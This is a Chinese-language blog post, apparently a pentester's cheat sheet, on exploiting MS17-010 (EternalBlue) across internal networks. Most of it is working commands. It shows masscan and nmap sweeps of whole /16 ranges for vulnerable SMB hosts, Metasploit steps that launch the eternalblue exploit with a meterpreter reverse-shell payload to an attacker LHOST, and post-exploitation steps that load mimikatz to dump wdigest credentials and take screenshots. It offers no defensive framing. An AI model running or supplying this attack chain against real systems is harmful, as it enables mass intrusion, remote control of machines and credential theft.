Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

MS17-010 内网一把梭指南

wpadmin~February 22, 2019 /InfoSec

Contents

MS17-010 内网一把梭指南

信息探测

参考资料
https://masterxsec.github.io/2017/05/27/Metasploit%E4%B8%AD%E7%9A%84MS17-010/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

其他 exploit
https://github.com/jflyup/goMS17-010

也可以使用 msf 自带的 scanner 探测 auxiliary/scanner/smb/smb_ms17_010

sudo masscan -p445 192.168.1.1/16 > 445_open.txt
vi 445_open.txt [ctrl+v G wwww d :q]
nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txt

漏洞利用

msfconsole

use exploit/windows/smb/ms17_010_eternalblue
show targets
set TARGET <target-id>
show options
# set payload windows/x64/meterpreter/reverse_tcp
# set payload windows/meterpreter/reverse_tcp
set RHOST <remote_host>
set LHOST <0.0.0.0>
options
exploit

Nmap

编译

从源码编译 Nmap compile nmap

$ sudo apt-get install git wget build-essential checkinstall libpcre3-dev libssl-dev clang
$ git clone https://github.com/nmap/nmap.git

Nmap 与 17010

nmap 192.168.1.1 --script smb-vuln-ms17-010
nmap 192.168.1.1 -Pn -sn --script smb-vuln-ms17-010 
nmap -iL list.txt -Pn -sn --script smb-vuln-ms17-010
nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txt
nmap --script smb-vuln-ms17-010.nse -n -p445 --open -oX d:\\out.xml 192.168.0.1/16

# 使用 -p445,139 限制可以加快扫描速度
nmap --script smb-vuln-ms17-010.nse -n -p445,139 -oX out.xml 192.168.0.1/16

在 Ubuntu 上安装 Metasploit

https://www.darkoperator.com/installing-metasploit-in-ubunt/

sudo proxychains4 apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

Meterpreter

msf>
load mimikatz
wdigest
screenshot
sysinfo

Leave a Reply

Your email address will not be published. Required fields are marked *